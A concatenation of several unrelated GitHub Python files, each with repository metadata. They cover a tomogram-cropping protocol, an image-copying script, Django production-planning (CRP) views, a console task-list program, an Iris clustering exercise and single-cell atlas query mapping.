self.runJob("xmipp_transform_window", params)
# Creating the output in pseudostreaming
outputresizedSetOfTomograms = self.getOutputSetOfTomograms()
newTomogram = Tomogram()
tomo = self.inputSet.get()[tomId]
newTomogram.copyInfo(tomo)
newTomogram.copyAttributes(tomo, '_origin')
newTomogram.setLocation(outputTomo)
newTomogram.setSamplingRate(self.inputSet.get().getSamplingRate())
outputresizedSetOfTomograms.append(newTomogram)
outputresizedSetOfTomograms.update(newTomogram)
outputresizedSetOfTomograms.write()
self._store()
def outputTomoFileName(self, folder, tomId, ext):
fnPath = os.path.join(folder, str(tomId) + ext)
return fnPath
def closeStreamStep(self):
self.getOutputSetOfTomograms().setStreamState(Set.STREAM_CLOSED)
self._store()
def getOutputSetOfTomograms(self):
'''
This function defines the output of the protocol
'''
if hasattr(self, "outputSetOfTomograms"):
self.outputSetOfTomograms.enableAppend()
else:
outputSetOfTomograms = self._createSetOfTomograms(suffix='cropped')
outputSetOfTomograms.copyInfo(self.inputSet.get())
outputSetOfTomograms.setSamplingRate(self.inputSet.get().getSamplingRate())
outputSetOfTomograms.setStreamState(Set.STREAM_OPEN)
self._defineOutputs(outputSetOfTomograms=outputSetOfTomograms)
self._defineSourceRelation(self.inputSet, outputSetOfTomograms)
return self.outputSetOfTomograms
# --------------------------- INFO functions ----------------------------
def _summary(self):
summary = []
if hasattr(self, 'outputSetOfTomograms'):
summary.append("%d tomograms have been resized using the xmipp_transform_window program\n"
% self.outputSetOfTomograms.getSize())
else:
summary.append("Output not ready yet.")
return summary
def _methods(self):
methods = []
if hasattr(self, 'outputSetOfTomograms'):
methods.append("%d tomograms have been resized using the xmipp_transform_window program\n"
% self.outputSetOfTomograms.getSize())
else:
methods.append("Output tomograms not ready yet.")
return methods
|
I2PC/scipion-em-xmipptomo
|
xmipptomo/protocols/protocol_crop_tomograms.py
|
protocol_crop_tomograms.py
|
py
| 6,045 |
python
|
en
|
code
| 4 |
github-code
|
6
|
6020834834
|
import os
import cv2
import shutil
source_path = 'test_copy_image'
des_path = 'train_image_label'
def get_all_label_file_to_image_file():
list_file = os.listdir(source_path)
list_label = [file for file in list_file if file.endswith('.txt')]
return list_label
def copy_image_according_to_label():
label_name = get_all_label_file_to_image_file()
print('There are {} label files'.format(len(label_name)))
print(label_name)
# copy files
for name in label_name:
# copy text file
orig_label = os.path.join(source_path, name)
des_label = os.path.join(des_path, name)
print(des_label)
shutil.copy(orig_label, des_label)
# copy image file
img_name = name.split('.')[0] + '.jpg'
orig_img = os.path.join(source_path, img_name)
#print(origin)
des_img = os.path.join(des_path, img_name)
#print(des)
img = cv2.imread(orig_img)
cv2.imwrite(des_img, img)
copy_image_according_to_label()
|
hluong89/calc_bounding_box_YOLO
|
copy_image_according_to_labels.py
|
copy_image_according_to_labels.py
|
py
| 1,014 |
python
|
en
|
code
| 1 |
github-code
|
6
|
34776536653
|
from django.http import JsonResponse, HttpResponseRedirect
from django.shortcuts import render, redirect
from django.urls import reverse
from ..filters.CRPFilter import CRPFilter
from ..forms.CRPForm import UpdateCRPForm, CRPTrackForm, AddCRPForm
from django.forms import modelformset_factory
from datetime import datetime, timedelta
from ..forms.ProductCenterForm import CapacitySchedulingFormCRP
from ..models.CRP import CRPTrack, CRP
from ..models.Finished import Finished
from ..models.OperationList import OperationList
from ..models.ProductCenter import ProductCenter, CapacityScheduling
from ..models.OperationSequence import OperationSequence
from django.contrib import messages
list_crp_props = {
"title": "CRP",
}
post_crp_props = {
"title": "Add CRP",
}
views_crp_props = {
"title": "View CRP",
}
update_crp_props = {
"title": "Update CRP",
'btn_name': 'Update'
}
copy_crp_props = {
"title": "Copy CRP",
'btn_name': 'Copy'
}
def ListCRP(request):
if request.method == "GET":
crp_track = CRPTrack.objects.all()
list_crp_props['crp_track'] = crp_track
list_crp_props['filters'] = CRPFilter()
return render(request, 'PP/planning/crp/list.html', context=list_crp_props)
def FilterCRP(request):
if request.method == 'POST':
filter = CRPFilter(request.POST, queryset=CRPTrack.objects.all())
if filter.is_valid():
if len(filter.qs.values()) != 0:
return JsonResponse({
'CRPTrack': list(filter.qs.values()),
'mass': 'success',
}, status=200)
else:
return JsonResponse({
'mass': 'error',
}, status=200)
else:
return JsonResponse({
'mass': 'error',
})
else:
return JsonResponse({
'mass': 'error',
})
def PostCRP(request):
if request.method == "POST":
finish = request.POST.get('finished_no')
order_ref = request.POST.get('order_ref')
order_qty = request.POST.get('order_qty')
if request.is_ajax():
finish = Finished.objects.get(id=finish)
opl = OperationList.objects.filter(id=finish.operations_list.id).values()
opsec = OperationSequence.objects.filter(operation_list=finish.operations_list).values()
crp = []
for ops in opsec:
pc = ProductCenter.objects.get(id=ops['production_center_id'])
cs = CapacityScheduling.objects.filter(ProductCenterId=ops['production_center_id']).last()
crp.append({
'operationSequence': ops['operationSequence'],
'productioncneter': pc.product_center_name,
'AvalStartDate': cs.Date,
'reqdcapunit': ops['reqdcapunit'],
'ReqdMcHrByUnit': ops['totaltime'],
'AvalStartTime': cs.EndTime,
'AvalMcHrOrDay': cs.BalMcOrHour,
'NoOfMCByResAval': int(pc.NoOfMByC) - int(cs.NoOfMCAlloctd),
'AvalCAPByDay': cs.BalanceCap,
})
crp_track_form = CRPTrackForm({'finished': finish,
'operationlist': finish.operations_list.id,
'product_description': finish.product_description,
'order_ref': order_ref,
'order_qty': order_qty
})
if crp_track_form.is_valid():
crp_track_form = crp_track_form.save()
return JsonResponse({
'mass': "success",
'operation_scheduling': list(opsec),
'crps': crp,
'CRPTrack': list(CRPTrack.objects.filter(id=crp_track_form.id).values())
}, status=200)
operationSequence = request.POST.getlist('operationSequence')
productioncneter = request.POST.getlist('productioncneter')
AvalStartDate = request.POST.getlist('AvalStartDate')
StartDate = request.POST.getlist('StartDate')
NoOfMCByResAval = request.POST.getlist('NoOfMCByResAval')
AvalCAPByDay = request.POST.getlist('AvalCAPByDay')
reqdcapunit = request.POST.getlist('reqdcapunit')
ReqdCAPByDay = request.POST.getlist('ReqdCAPByDay')
AvalMcHrOrDay = request.POST.getlist('AvalMcHrOrDay')
ReqdMcHrByUnit = request.POST.getlist('ReqdMcHrByUnit')
ReqdMcHour = request.POST.getlist('ReqdMcHour')
AvalStartTime = request.POST.getlist('AvalStartTime')
StartTime = request.POST.getlist('StartTime')
EndTime = request.POST.getlist('EndTime')
EndDate = request.POST.getlist('EndDate')
NoOfMcByRes = request.POST.getlist('NoOfMcByRes')
mc_id_no = request.POST.getlist('mc_id_no')
crp_track = request.POST.getlist('crp_track')
mass = False
if len(operationSequence) != 0:
for x in range(0, len(operationSequence)):
crp = AddCRPForm({
'crp_track': CRPTrack.objects.get(id=crp_track[x]),
'operationSequence': operationSequence[x],
"productioncneter": productioncneter[x],
"reqdcapunit": reqdcapunit[x],
"ReqdMcHrByUnit": ReqdMcHrByUnit[x],
"AvalStartDate": AvalStartDate[x],
'AvalStartTime': AvalStartTime[x],
"NoOfMCByResAval": NoOfMCByResAval[x],
"AvalCAPByDay": AvalCAPByDay[x],
'AvalMcHrOrDay': AvalMcHrOrDay[x],
'StartDate': StartDate[x],
'ReqdCAPByDay': ReqdCAPByDay[x],
'ReqdMcHour': ReqdMcHour[x],
'StartTime': StartTime[x],
'EndTime': EndTime[x],
'EndDate': EndDate[x],
'NoOfMcByRes': NoOfMcByRes[x],
'mc_id_no': mc_id_no[x]
})
if crp.is_valid():
crp = crp.save()
crp_tracks = CRPTrack.objects.get(id=crp.crp_track)
BalanceCap = int(crp.AvalCAPByDay) - int(crp.ReqdCAPByDay)
cs = CapacitySchedulingFormCRP({
'ProductCenterId': ProductCenter.objects.get(product_center_name=crp.productioncneter),
'Date': crp.AvalStartDate,
'AvalCapOrDay': crp.AvalCAPByDay,
'CapALlloctdTo': crp_tracks.finished.id,
'AlloctdCap': crp.ReqdCAPByDay,
'BalanceCap': BalanceCap,
'AvalMcOrResHour': crp.AvalMcHrOrDay,
'ReqdMcOrResHour': crp.ReqdMcHour,
'BalMcOrHour': str(float(crp.AvalMcHrOrDay) - float(crp.ReqdMcHour)),
'StartTime': crp.StartTime,
'EndTime': crp.EndTime,
'NoOfMCAlloctd': crp.NoOfMcByRes,
})
if cs.is_valid():
cs.save()
if BalanceCap == 0:
AvalStartDates = datetime.strptime(str(crp.AvalStartDate), '%Y-%m-%d')
AvalStartDates = AvalStartDates + timedelta(days=1)
pc = ProductCenter.objects.get(product_center_name=crp.productioncneter)
csl = CapacityScheduling.objects.filter(ProductCenterId=pc.id).first()
cs = CapacitySchedulingFormCRP({
'ProductCenterId': ProductCenter.objects.get(product_center_name=crp.productioncneter),
'Date': AvalStartDates,
'AvalCapOrDay': csl.AvalCapOrDay,
'CapALlloctdTo': csl.CapALlloctdTo,
'AlloctdCap': csl.AlloctdCap,
'BalanceCap': csl.BalanceCap,
'AvalMcOrResHour': csl.AvalMcOrResHour,
'ReqdMcOrResHour': csl.ReqdMcOrResHour,
'BalMcOrHour': csl.BalMcOrHour,
'StartTime': csl.StartTime,
'EndTime': csl.EndTime,
'NoOfMCAlloctd': csl.NoOfMCAlloctd,
})
if cs.is_valid():
cs.save()
mass = True
else:
mass = False
if mass:
messages.success(request, 'CRP Created Successfully.')
return HttpResponseRedirect(reverse('productionplanning:CRP', args={crp_track[0]}))
else:
messages.error(request, 'CRP Not Created Successfully.')
return render(request, 'PP/Planning/crp/general_data_form.html', context=post_crp_props)
else:
return render(request, 'PP/Planning/crp/general_data_form.html', context=post_crp_props)
def AddCRP(request, id):
crp_track = CRPTrack.objects.get(id=id)
crp = CRP.objects.filter(crp_track=crp_track.id)
post_crp_props['crp_track'] = crp_track
post_crp_props['crp'] = crp
return render(request, 'PP/Planning/crp/add_crp.html', context=post_crp_props)
def ViewCRP(request, id):
crp_track = CRPTrack.objects.get(id=id)
crp = CRP.objects.filter(crp_track=crp_track.id)
views_crp_props['crp_track'] = crp_track
views_crp_props['crp'] = crp
return render(request, 'PP/Planning/crp/views.html', context=views_crp_props)
def UpdateCRP(request, id):
crp_track = CRPTrack.objects.get(id=id)
crp = CRP.objects.filter(crp_track=crp_track.id)
update_crp_props['crp_track'] = crp_track
update_crp_props['crp'] = crp
CRPFoemSet = modelformset_factory(CRP, form=UpdateCRPForm, extra=0)
formset = CRPFoemSet(queryset=crp)
update_crp_props['formset'] = formset
if request.POST:
formset = CRPFoemSet(request.POST, queryset=crp)
if formset.has_changed():
if formset.is_valid():
formset.save()
messages.success(request, 'CRP Update Successfully.')
return HttpResponseRedirect(reverse('productionplanning:UpdateCRP', args={crp_track.id}))
else:
messages.error(request, 'CRP Form is not valid.')
return HttpResponseRedirect(reverse('productionplanning:UpdateCRP', args={crp_track.id}))
else:
messages.error(request, 'Value is not Change.')
return HttpResponseRedirect(reverse('productionplanning:UpdateCRP', args={crp_track.id}))
else:
return render(request, 'PP/Planning/crp/update_crp.html', context=update_crp_props)
def CopyCRP(request, id):
crp_track = CRPTrack.objects.get(id=id)
crp = CRP.objects.filter(crp_track=crp_track.id)
copy_crp_props['crp_track'] = crp_track
copy_crp_props['crp'] = crp
CRPFoemSet = modelformset_factory(CRP, form=UpdateCRPForm, extra=0)
formset = CRPFoemSet(queryset=crp)
copy_crp_props['formset'] = formset
if request.POST:
mass = []
crp_trackForm = CRPTrackForm(data={
'finished': crp_track.finished,
'operationlist': crp_track.operationlist,
'product_description': crp_track.product_description,
'order_ref': crp_track.order_ref,
'order_qty': crp_track.order_qty,
})
if crp_trackForm.is_valid():
crp_trackForm = crp_trackForm.save()
for x in crp:
dirs = {
'crp_track': CRPTrack.objects.get(id=crp_trackForm.id),
'operationSequence': x.operationSequence,
'productioncneter': x.productioncneter,
'AvalStartDate': x.AvalStartDate,
'StartDate': x.StartDate,
'reqdcapunit': x.reqdcapunit,
'ReqdMcHrByUnit': x.ReqdMcHrByUnit,
'AvalStartTime': x.AvalStartTime,
'AvalMcHrOrDay': x.AvalMcHrOrDay,
'NoOfMCByResAval': x.NoOfMCByResAval,
'AvalCAPByDay': x.AvalCAPByDay,
'ReqdCAPByDay': x.ReqdCAPByDay,
'ReqdMcHour': x.ReqdMcHour,
'StartTime': x.StartTime,
'EndTime': x.EndTime,
'EndDate': x.EndDate,
'NoOfMcByRes': x.NoOfMcByRes,
'mc_id_no': x.mc_id_no,
}
crp_form = UpdateCRPForm(data=dirs)
print(2,crp_form.is_valid())
if crp_form.is_valid():
crp_form = crp_form.save(commit=False)
crp_form.crp_track = CRPTrack.objects.get(id=crp_trackForm.id)
crp_form.save()
mass.append(True)
else:
mass.append(False)
if len(mass) == mass.count(True):
messages.success(request, '{} to {} Copy Successfully.'.format(id, crp_trackForm.id))
return redirect('/productionplanning/crp/')
else:
messages.error(request, 'Copy Not Successfully.')
return redirect('/productionplanning/crp/')
else:
messages.error(request, "CRP Form isn't Valid.")
return redirect('/productionplanning/crp/')
else:
return render(request, 'PP/Planning/crp/update_crp.html', context=copy_crp_props)
def DeleteCRP(request, id):
crp = CRPTrack.objects.get(id=id)
crp.delete()
messages.error(request, '{} Delete Successfully.'.format(id))
return redirect('/productionplanning/crp/')
|
nazmul53p/ERP
|
productionplanning/views/CRPViews.py
|
CRPViews.py
|
py
| 14,011 |
python
|
en
|
code
| 1 |
github-code
|
6
|
12578258527
|
class Task:
def __init__(self, id, description):
self.id = id
self.description = description
class TaskList:
def __init__(self, file_name):
self.file_name = file_name
self.tasks = []
self.load_tasks()
def load_tasks(self):
try:
with open(self.file_name, 'r') as f:
for line in f:
id, description = line.strip().split('|')
self.tasks.append(Task(id, description))
except FileNotFoundError:
pass
def save_tasks(self):
with open(self.file_name, 'w') as f:
for task in self.tasks:
f.write(f"{task.id}|{task.description}\n")
def create_task(self, description):
id = len(self.tasks) + 1
task = Task(id, description)
self.tasks.append(task)
self.save_tasks()
return task
def read_tasks(self):
return self.tasks
def update_task(self, id, description):
for task in self.tasks:
if task.id == id:
task.description = description
self.save_tasks()
return task
def delete_task(self, id):
for i, task in enumerate(self.tasks):
if task.id == id:
del self.tasks[i]
self.save_tasks()
return
# Exemplo de uso:
task_list = TaskList('tasks.txt')
while True:
# Imprime o menu de opções
print('\nEscolha uma opção:')
print('1. Ver tarefas')
print('2. Adicionar tarefa')
print('3. Atualizar tarefa')
print('4. Remover tarefa')
print('0. Sair')
# Lê a opção escolhida pelo usuário
option = input('> ')
if option == '1':
# Ler todas as tarefas
tasks = task_list.read_tasks()
for task in tasks:
print(task.id, task.description)
elif option == '2':
# Criar uma nova tarefa
description = input('Digite a descrição da tarefa: ')
task = task_list.create_task(description)
print(f'Tarefa {task.id} adicionada com sucesso!')
elif option == '3':
# Atualizar uma tarefa existente
id = input('Digite o ID da tarefa que deseja atualizar: ')
description = input('Digite a nova descrição da tarefa: ')
task = task_list.update_task(int(id), description)
if task:
print(f'Tarefa {task.id} atualizada com sucesso!')
else:
print('Tarefa não encontrada')
elif option == '4':
# Remover uma tarefa existente
id = input('Digite o ID da tarefa que deseja remover: ')
task_list.delete_task(int(id))
print(f'Tarefa {id} removida com sucesso!')
elif option == '0':
# Sai do programa
break
else:
print('Opção inválida, tente novamente')
|
EltonLunardi/Projetos_pequenos
|
CRUDSimples/crud.py
|
crud.py
|
py
| 2,863 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
41364868505
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 31 11:56:58 2019
@author: saransh
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans,AgglomerativeClustering,DBSCAN
from sklearn.datasets import load_digits
from sklearn.decomposition import PCA
from sklearn import metrics
from scipy.optimize import linear_sum_assignment
def purity_score(y_true, y_pred):
contingency_matrix = metrics.cluster.contingency_matrix(y_true, y_pred)
row_ind, col_ind = linear_sum_assignment(-contingency_matrix)
return contingency_matrix[row_ind, col_ind].sum() / np.sum(contingency_matrix)
csv = pd.read_csv("Iris.csv")
datay = csv["Species"]
data = csv.drop(columns = ["Species"],axis = 1)
#pca = PCA(n_components=2).fit(data)
data = PCA(n_components=2).fit_transform(data)
data=pd.DataFrame(data)
print("_________________")
print(" ")
print("2D-Points After Reducing Dimensions ")
print("_________________")
plt.scatter(data.iloc[:,0],data.iloc[:,1],color="blue")
plt.show()
Kmean = KMeans(n_clusters=3)
labels = Kmean.fit_predict(data)
#labels = Kmean.predict(data)
print("_________________")
print(" ")
print("KMeans Clustering")
print("_________________")
plt.scatter(data.iloc[:,0],data.iloc[:,1],c=Kmean.labels_,cmap='viridis')
centers=Kmean.cluster_centers_
plt.scatter(centers[:,0],centers[:,1],s=100,c='black')
plt.show()
print("purity score for KMeans Clustering is -")
print(purity_score(pd.DataFrame(datay),pd.DataFrame(labels)))
print("_________________")
print(" ")
print(" ")
print(" ")
print("_________________")
print(" ")
print("Agglomerative Clustering")
print("_________________")
cluster = AgglomerativeClustering(n_clusters=3, affinity='euclidean', linkage='average')
labelag=cluster.fit_predict(data)
plt.scatter(data.iloc[:,0],data.iloc[:,1], c=cluster.labels_, cmap='rainbow')
plt.show()
'''
Kmean.fit(data)
labels = Kmean.predict(data)
print("_________________")
print(" ")
print("KMeans Clustering")
print("_________________")
plt.scatter(data.iloc[:,0],data.iloc[:,1],c=labels,cmap='viridis')
centers=Kmean.cluster_centers_
plt.scatter(centers[:,0],centers[:,1],s=100,c='black')
plt.show()
print("purity score for KMeans Clustering is -")
print(purity_score(pd.DataFrame(datay),pd.DataFrame(labels)))
print("_________________")
plt.show()
'''
print("purity score for Agglomerative Clustering is -")
print(purity_score(pd.DataFrame(datay),pd.DataFrame(labelag)))
print("_________________")
print(" ")
print(" ")
print("_________________")
print(" ")
print("DBSCAN")
print("_________________")
epsp=[0.05,0.5,0.95]
min_samplesp=[1,5,10,20]
ps=[]
arr = []
for i in epsp:
for j in min_samplesp:
db = DBSCAN(eps = i, min_samples = j)
arr.append([i,j])
labels1 = db.fit_predict(data)
ps.append([purity_score(pd.DataFrame(datay),pd.DataFrame(labels1)),i,j])
psmax=max(ps)
ind = ps.index(psmax)
print('for eps = 0.05 and minpts = 1')
db = DBSCAN(eps = 0.05, min_samples = 1).fit(data)
labels1 = db.labels_
plt.scatter(data.iloc[:,0],data.iloc[:,1], c=db.labels_)
plt.show()
db = DBSCAN(eps = arr[ind][0], min_samples = arr[ind][1]).fit(data)
labels1 = db.labels_
plt.scatter(data.iloc[:,0],data.iloc[:,1], c=db.labels_, cmap='rainbow')
plt.show()
print("purity score for DBSAN is -")
print(purity_score(pd.DataFrame(datay),pd.DataFrame(labels1)))
print("_________________")
|
Saransh0905/Data-Science-3
|
agglomerativeClustering and DBSCAN/lab11.py
|
lab11.py
|
py
| 3,419 |
python
|
en
|
code
| 1 |
github-code
|
6
|
31533884286
|
actor_name = input()
points_from_academy = float(input())
number_of_evaluators = int(input())
total_points = points_from_academy
total_evaluator_points = 0
difference = 0
is_nominated = False
for evaluator in range(number_of_evaluators):
evaluator_name = input()
evaluator_points = float(input())
total_evaluator_points = len(evaluator_name) * evaluator_points / 2
total_points += total_evaluator_points
if total_points > 1250.5:
is_nominated = True
break
if is_nominated:
print(f"Congratulations, {actor_name} got a nominee for leading role with {total_points:.1f}!")
if not is_nominated:
difference = abs(total_points - 1250.5)
print(f"Sorry, {actor_name} you need {difference:.1f} more!")
|
iliyan-pigeon/Soft-uni-Courses
|
programming_basics_python/for_loops/oscars.py
|
oscars.py
|
py
| 741 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5432983759
|
import logging
import warnings
from typing import List, Tuple
import numpy as np
import pandas as pd
from anndata import AnnData
from mudata import MuData
from pandas.api.types import is_numeric_dtype
from sklearn.neighbors import KNeighborsClassifier
from ..utils import check_transition_rule, get_views_from_structure
from .MultiViewAtlas import MultiViewAtlas, _harmonize_mdata_full
warnings.simplefilter(action="ignore", category=FutureWarning)
warnings.simplefilter(action="ignore", category=UserWarning)
# logger = logging.getLogger(__name__)
# logger.propagate = False
# ch = RichHandler(level=logging.INFO, show_path=False, show_time=False)
# formatter = logging.Formatter("%(message)s")
# ch.setFormatter(formatter)
# logger.addHandler(ch)
def load_query(
mvatlas: MultiViewAtlas,
adata_query: AnnData,
) -> MultiViewAtlas:
"""Load query data to full view of multi-view atlas
Params:
-------
mvatlas:
MultiViewAtlas object
adata_query:
AnnData of query data
Returns:
--------
MultiViewAtlas object with mapped query cells in full view
"""
# Define all current view - next view pairs for assignment
view_pairs = mvatlas.get_view_pairs()
# Check if query cells already in mdata
if adata_query.obs_names.isin(mvatlas.mdata.obs_names).all():
vdata_full = mvatlas.mdata["full"].copy()
else:
vdata_full = concatenate_query(mvatlas, adata_query, "full")
# Check that at least one mapping from full view is possible with transition rules
rules_from_full = view_pairs[view_pairs.depth == 0]["transition_rule"].unique()
missing_rules = []
for r in rules_from_full:
try:
if check_transition_rule(adata_query, r) is None:
continue
except ValueError:
missing_rules.append(r)
if len(rules_from_full) == len(missing_rules):
raise ValueError(
f"""
No mapping possible from full view. Please add info on rules {missing_rules} to query dataset
"""
)
mdata = mvatlas.mdata.copy()
mdata.mod["full"] = vdata_full.copy()
try:
mdata.update()
except KeyError:
mdata.update()
del mdata.obsm["view_assign"]
mvatlas_mapped = MultiViewAtlas(mdata, rename_obsm=False)
mvatlas_mapped.view_transition_rule = mvatlas.view_transition_rule.copy()
_harmonize_mdata_full(mvatlas_mapped)
return mvatlas_mapped
def split_query(
mvatlas_mapped: MultiViewAtlas,
) -> MultiViewAtlas:
"""Assign query data to views in atlas, based on transition rules.
Params:
-------
mvatlas:
MultiViewAtlas object
Returns:
--------
MultiViewAtlas object with mapped query cells
"""
# Define all current view - next view pairs for assignment
view_pairs = mvatlas_mapped.get_view_pairs()
# Check that load_query was run
try:
if sum(mvatlas_mapped.mdata["full"].obs["dataset_group"] == "query") == 0:
raise ValueError("No query cells in mdata - run load_query first")
except KeyError:
raise ValueError("No query cells in mdata - run load_query first")
vdata_full = mvatlas_mapped.mdata["full"].copy()
new_view_assign = pd.DataFrame()
vdata_dict = {}
vdata_dict["full"] = vdata_full.copy()
for _, row in view_pairs.iterrows():
depth = row["depth"]
current_view = row["parent_view"]
next_view = row["child_view"]
try:
n_query_current = sum(vdata_dict[current_view].obs["dataset_group"] == "query")
except KeyError:
n_query_current = 0
try:
n_query_next = sum(mvatlas_mapped.mdata[next_view].obs["dataset_group"] == "query")
except KeyError:
n_query_next = 0
# if "dataset_group" in vdata_dict[current_view].obs:
if n_query_current > 0:
adata_query = vdata_dict[current_view][vdata_dict[current_view].obs["dataset_group"] == "query"].copy()
logging.info(f"Assigning to {next_view} from {current_view} with rule {row['transition_rule']}")
# print(adata_query)
# print(vdata_dict[current_view])
# print(mvatlas_mapped.mdata[current_view])
if n_query_next > 0:
logging.info(f"Query cells already in {next_view}")
v_assign = mvatlas_mapped.mdata.obsm["view_assign"][[next_view]]
vdata_dict[next_view] = mvatlas_mapped.mdata[next_view].copy()
else:
adata_query_concat = AnnData(obs=adata_query.obs, obsm=adata_query.obsm, obsp=adata_query.obsp)
if depth > 0:
adata_query_concat = adata_query_concat[
new_view_assign.loc[adata_query_concat.obs_names, current_view] == 1
].copy()
v_assign, next_view_adata = map_next_view(
mvatlas_mapped, adata_query_concat, current_view=current_view, next_view=next_view
)
vdata_dict[next_view] = next_view_adata.copy()
else:
logging.info(f"No query cells in {current_view}")
v_assign = mvatlas_mapped.mdata.obsm["view_assign"][[next_view]]
vdata_dict[next_view] = mvatlas_mapped.mdata[next_view].copy()
new_view_assign = pd.concat([new_view_assign, v_assign], 1)
new_view_assign = new_view_assign.fillna(0)
vdata_full.obsm["view_assign"] = new_view_assign.copy()
vdata_full.uns["view_hierarchy"] = mvatlas_mapped.view_hierarchy
vdata_dict["full"] = vdata_full
mdata = MuData({v: vdata_dict[v] for v in get_views_from_structure(mvatlas_mapped.view_hierarchy)})
mdata.mod["full"] = mdata.mod["full"][mdata.obs_names].copy()
view_transition_rule = mvatlas_mapped.view_transition_rule.copy()
# trans_rule = pd.Series(mvatlas.view_transition_rule.values.ravel()).dropna().unique()[0]
mvatlas_mapped = MultiViewAtlas(mdata, rename_obsm=False, transition_rule=view_transition_rule)
# mvatlas_mapped.view_transition_rule = view_transition_rule.copy()
return mvatlas_mapped
def concatenate_query(
mvatlas: MultiViewAtlas,
adata_query: AnnData,
view: str,
batch_key: str = "dataset_group",
batch_categories: List[str] = None,
):
"""Concatenate query data to atlas data"""
if batch_categories is None:
batch_categories = ["atlas", "query"]
adata_atlas = mvatlas.mdata[view].copy()
assert np.intersect1d(adata_atlas.obs_names, adata_query.obs_names).size == 0
adata_atlas = adata_atlas.concatenate(
adata_query, batch_key=batch_key, batch_categories=batch_categories, index_unique=None, uns_merge="unique"
)
return adata_atlas
def assign_from_similarity(Y_assign_atlas, X_similarity_atlas, X_similarity_query, v_assign, k=10):
"""Assign query cells to atlas views based on similarity to atlas cells.
Similarity can be derived from metadata annotation or from latent space
"""
if not isinstance(v_assign, pd.DataFrame):
raise ValueError("v_assign must be a pandas DataFrame")
if not v_assign.shape[1] == 1:
raise ValueError("v_assign must have only one column")
clf = KNeighborsClassifier(n_neighbors=k, metric="euclidean").fit(X_similarity_atlas, Y_assign_atlas)
Y_assign_query = clf.predict(X_similarity_query)
assign_predict = pd.DataFrame(Y_assign_query, columns=v_assign.columns)
return assign_predict
def map_next_view(
mvatlas: MultiViewAtlas,
adata_query: AnnData,
current_view: str,
next_view: str,
batch_key: str = "dataset_group",
batch_categories: List[str] = None,
) -> Tuple[pd.DataFrame, AnnData]:
"""Assign query cells to next view based on similarity to atlas cells.
Similarity is defined by the transition rule.
"""
if batch_categories is None:
batch_categories = ["atlas", "query"]
# curr_view_adata = _concatenate_query(mvatlas, adata_query, current_view, batch_key=batch_key, batch_categories=batch_categories)
curr_view_adata = mvatlas.mdata[current_view].copy()
next_view_adata = mvatlas.mdata[next_view].copy()
# Get similarity from transition rule
if batch_key in curr_view_adata.obs.columns:
v_assign = mvatlas.mdata.obsm["view_assign"].loc[mvatlas.mdata["full"].obs[batch_key] == batch_categories[0]][
[next_view]
]
curr_view_adata = curr_view_adata[curr_view_adata.obs[batch_key] == batch_categories[0]].copy()
# next_view_adata = next_view_adata[next_view_adata.obs[batch_key] == batch_categories[0]].copy()
# assert "dataset_group" not in next_view_adata.obs.columns
else:
v_assign = mvatlas.mdata.obsm["view_assign"].loc[mvatlas.mdata["full"].obs[batch_key] == batch_categories[0]][
[next_view]
]
transition_rule = mvatlas.view_transition_rule[current_view][next_view]
if transition_rule is not None:
try:
check_transition_rule(adata_query, transition_rule)
except ValueError:
logging.warning(
f"Could not check transition rule {transition_rule} for query data - skipping mapping from {current_view} to {next_view}"
)
v_assign_query = pd.DataFrame(0, columns=[next_view], index=adata_query.obs_names)
v_assign = pd.concat([v_assign, v_assign_query], axis=0)
return v_assign, next_view_adata
# Split to next view based on transition rule
# if transition is in obs
if transition_rule in adata_query.obs.columns:
if is_numeric_dtype(adata_query.obs[transition_rule]):
X_similarity_atlas = curr_view_adata.obs[[transition_rule]].values
X_similarity_query = adata_query.obs[[transition_rule]].values
else:
X_similarity_atlas = pd.get_dummies(curr_view_adata.obs[transition_rule])
X_similarity_query = pd.get_dummies(adata_query.obs[transition_rule])
# Check for missing levels
missing_cols = [x for x in X_similarity_atlas.columns if x not in X_similarity_query.columns]
if len(missing_cols) > 0:
X_similarity_query[missing_cols] = 0
X_similarity_query = X_similarity_query[X_similarity_atlas.columns].copy()
X_similarity_atlas = X_similarity_atlas.values
X_similarity_query = X_similarity_query.values
if transition_rule in adata_query.obsm:
X_similarity_atlas = curr_view_adata.obsm[transition_rule]
X_similarity_query = adata_query.obsm[transition_rule]
# X_similarity = curr_view_adata.obsm[transition_rule]
else:
raise ValueError(f"No transition rule defined for {current_view} -> {next_view}")
# Get assignment to next view
Y_assign_atlas = v_assign.loc[curr_view_adata.obs_names].values.ravel()
v_assign_query = assign_from_similarity(Y_assign_atlas, X_similarity_atlas, X_similarity_query, v_assign)
v_assign_query.index = adata_query.obs_names
v_assign = pd.concat([v_assign, v_assign_query], axis=0)
next_view_adata = concatenate_query(
mvatlas,
adata_query[v_assign_query[next_view] == 1],
next_view,
batch_key=batch_key,
batch_categories=batch_categories,
)
return v_assign, next_view_adata
|
Teichlab/multi-view-atlas
|
src/multi_view_atlas/tl/map_query.py
|
map_query.py
|
py
| 11,557 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8633193297
|
'''
Exercise 5
Take two lists, say for example these two:
a = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]
b = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]
and write a program that returns a list that contains only the elements that are common between the lists (without duplicates). Make sure your program works on two lists of different sizes.
Extras:
1. Randomly generate two lists to test this
2. Write this in one line of Python (don’t worry if you can’t figure this out at this point - we’ll get to it soon)
'''
#Using hash look up table to make the complexity to O(n+m)
from random import randint
def main():
list_1 = [randint(0,20) for r in range(randint(10,20))]
list_2 = [randint(0,20) for r in range(randint(10,20))]
result = []
D = {}
for num in list_1:
if num not in D:
D[num] = ''
for num in list_2:
if (num in D) and (D[num] == ''):
result.append(num)
D[num] = ' '
list_1.sort() #sort for human to check for mistake(O(nlogn)
list_2.sort()
result.sort()
print('List 1: {}'.format(list_1))
print('List 2: {}'.format(list_2))
print('Result: {}'.format(result))
if __name__ == "__main__":
main()
|
kaichunchou/Python-Review
|
Exercise_5/Exercise_5.py
|
Exercise_5.py
|
py
| 1,255 |
python
|
en
|
code
| 0 |
github-code
|
6
|
19624665111
|
# -*- coding: utf-8 -*-
import math
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render, redirect
from django.contrib import messages
# Create your views here.
